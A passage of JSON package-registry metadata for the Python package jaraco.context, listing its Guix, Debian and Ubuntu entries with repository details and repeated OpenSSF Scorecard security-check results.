fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-06T19:26:18.134Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:guix/python-jaraco-context","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/guix/python-jaraco-context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/guix/python-jaraco-context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/guix/python-jaraco-context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/python-jaraco-context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/python-jaraco-context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/python-jaraco-context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/python-jaraco-context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/python-jaraco-context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages/python-jaraco-context/codemeta","maintainers":[],"registry":{"name":"guix","url":"https://guix.gnu.org","ecosystem":"guix","default":true,"packages_count":32342,"maintainers_count":0,"namespaces_count":0,"keywords_count":1654,"github":"guix-mirror","metadata":{"funded_packages_count":1223},"icon_url":"https://github.com/guix-mirror.png","created_at":"2026-03-02T16:23:46.981Z","updated_at":"2026-08-24T05:05:20.073Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/guix/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/guix/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/guix/namespaces"}},{"id":13689506,"name":"jaraco.context","ecosystem":"debian","description":null,"homepage":"https://github.com/jaraco/jaraco.context","licenses":null,"normalized_licenses":[],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":["misc"],"namespace":"main","versions_count":1,"first_release_published_at":"2026-02-12T18:47:24.587Z","latest_release_published_at":"2026-02-12T18:47:24.587Z","latest_release_number":"4.2.0-1","last_synced_at":"2026-08-22T00:38:37.707Z","created_at":"2026-02-12T18:47:24.328Z","updated_at":"2026-08-22T00:38:37.707Z","registry_url":"https://tracker.debian.org/pkg/jaraco.context","install_command":"apt-get install jaraco.context","documentation_url":"https://packages.debian.org/bookworm/jaraco.context","metadata":{"component":"main","architecture":"all","priority":"optional","binary":"python3-jaraco.context","standards_version":"4.6.1","maintainer":"Jeroen Ploemen \u003cjcfp@debian.org\u003e","build_depends":"debhelper-compat (= 13), dh-python, pybuild-plugin-pyproject, python3-all, python3-pytest \u003c!nocheck\u003e, python3-setuptools, python3-setuptools-scm","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-06T19:26:18.145Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/debian/jaraco.context?arch=source\u0026distro=debian-12","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/debian/jaraco.context","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/debian/jaraco.context","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/debian/jaraco.context/dependencies","status":null,"funding_links":["https://tidelift.com/funding/github/pypi/jaraco.context"],"critical":null,"issue_metadata":{"last_synced_at":"2026-05-04T03:01:07.388Z","issues_count":10,"pull_requests_count":8,"avg_time_to_close_issue":2735931.4,"avg_time_to_close_pull_request":15088803.8,"issues_closed_count":5,"pull_requests_closed_count":5,"pull_request_authors_count":3,"issue_authors_count":4,"avg_comments_per_issue":0.4,"avg_comments_per_pull_request":0.375,"merged_pull_requests_count":4,"bot_issues_count":0,"bot_pull_requests_count":0,"past_year_issues_count":0,"past_year_pull_requests_count":2,"past_year_avg_time_to_close_issue":null,"past_year_avg_time_to_close_pull_request":null,"past_year_issues_closed_count":0,"past_year_pull_requests_closed_count":0,"past_year_pull_request_authors_count":1,"past_year_issue_authors_count":0,"past_year_avg_comments_per_issue":null,"past_year_avg_comments_per_pull_request":0.0,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":0,"past_year_merged_pull_requests_count":0,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/issues","maintainers":[{"login":"jaraco","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jaraco"}],"active_maintainers":[]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/jaraco.context/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/jaraco.context/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/jaraco.context/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/jaraco.context/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/jaraco.context/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages/jaraco.context/codemeta","maintainers":[],"registry":{"name":"debian-12","url":"https://packages.debian.org/bookworm","ecosystem":"debian","default":true,"packages_count":34734,"maintainers_count":0,"namespaces_count":4,"keywords_count":2650,"github":"debian","metadata":{"codename":"bookworm","funded_packages_count":1231},"icon_url":"https://github.com/debian.png","created_at":"2026-02-04T11:01:49.459Z","updated_at":"2026-08-24T05:06:15.317Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/debian-12/namespaces"}},{"id":13380084,"name":"jaraco.context","ecosystem":"ubuntu","description":null,"homepage":"https://github.com/jaraco/jaraco.context","licenses":null,"normalized_licenses":[],"repository_url":"https://github.com/jaraco/jaraco.context","keywords_array":["misc"],"namespace":"main","versions_count":1,"first_release_published_at":"2026-02-05T05:37:31.432Z","latest_release_published_at":"2026-02-05T05:37:31.432Z","latest_release_number":"4.3.0-1","last_synced_at":"2026-08-04T11:12:50.903Z","created_at":"2026-02-05T05:37:31.111Z","updated_at":"2026-08-06T19:26:18.171Z","registry_url":"https://launchpad.net/ubuntu/+source/jaraco.context","install_command":"apt-get install jaraco.context","documentation_url":null,"metadata":{"component":"main","architecture":"all","priority":"optional","binary":"python3-jaraco.context","standards_version":"4.6.2","maintainer":"Jeroen Ploemen \u003cjcfp@debian.org\u003e","build_depends":"debhelper-compat (= 13), dh-python, pybuild-plugin-pyproject, python3-all, python3-pytest \u003c!nocheck\u003e, python3-setuptools, python3-setuptools-scm","build_depends_indep":null,"build_depends_arch":null},"repo_metadata":{"id":46308908,"uuid":"53202327","full_name":"jaraco/jaraco.context","owner":"jaraco","description":null,"archived":false,"fork":false,"pushed_at":"2026-05-03T23:37:03.000Z","size":567,"stargazers_count":3,"open_issues_count":3,"forks_count":6,"subscribers_count":1,"default_branch":"main","last_synced_at":"2026-07-22T01:57:48.493Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/jaraco.png","metadata":{"files":{"readme":"README.rst","changelog":"NEWS.rst","contributing":null,"funding":".github/FUNDING.yml","license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"tidelift":"pypi/jaraco.context"}},"created_at":"2016-03-05T13:22:19.000Z","updated_at":"2026-05-03T23:31:36.000Z","dependencies_parsed_at":"2023-12-26T16:54:58.630Z","dependency_job_id":"3b2b5c91-6e4b-4ab0-91a3-57c8b1e5e15c","html_url":"https://github.com/jaraco/jaraco.context","commit_stats":{"total_commits":501,"total_committers":23,"mean_commits":"21.782608695652176","dds":0.07784431137724546,"last_synced_commit":"733f4e107c9ac42f2b117acfb7915dc42b3e82e5"},"previous_names":[],"tags_count":31,"template":false,"template_full_name":null,"purl":"pkg:github/jaraco/jaraco.context","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/jaraco","download_url":"https://codeload.github.com/jaraco/jaraco.context/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/jaraco%2Fjaraco.context/sbom","scorecard":{"id":505978,"data":{"date":"2025-08-11","repo":{"name":"github.com/jaraco/jaraco.context","commit":"dcbca067e28727894fa38985c7724c76a02792ff"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":4.7,"checks":[{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Code-Review","score":0,"reason":"Found 0/30 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/main.yml:113","Info: topLevel 'contents' permission set to 'read': .github/workflows/main.yml:16"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Maintained","score":0,"reason":"0 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"SAST","score":0,"reason":"no SAST tool detected","details":["Warn: no pull requests merged into dev branch"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:66: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:84: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:88: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/main.yml:107: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:120: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/main.yml:122: update your workflow using https://app.stepsecurity.io/secureworkflow/jaraco/jaraco.context/main.yml/main?enable=pin","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:93","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:127","Warn: pipCommand not pinned by hash: .github/workflows/main.yml:72","Info:   0 out of   6 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   1 third-party GitHubAction dependencies pinned","Info:   0 out of   3 pipCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"License","score":0,"reason":"license file not detected","details":["Warn: project does not have a license file"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Branch-Protection","score":0,"reason":"branch protection not enabled on development/release branches","details":["Warn: branch protection not enabled for branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}}]},"last_synced_at":"2025-08-19T23:15:11.199Z","repository_id":46308908,"created_at":"2025-08-19T23:15:11.199Z","updated_at":"2025-08-19T23:15:11.199Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36327833,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-07-20T02:08:10.276Z","status":"online","status_checked_at":"2026-08-06T02:00:07.852Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"repo_metadata_updated_at":"2026-08-06T19:26:18.171Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":0.0,"dependent_packages_count":0.0,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":100},"purl":"pkg:deb/ubuntu/jaraco.context?arch=source\u0026distro=ubuntu-24.04","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/ubu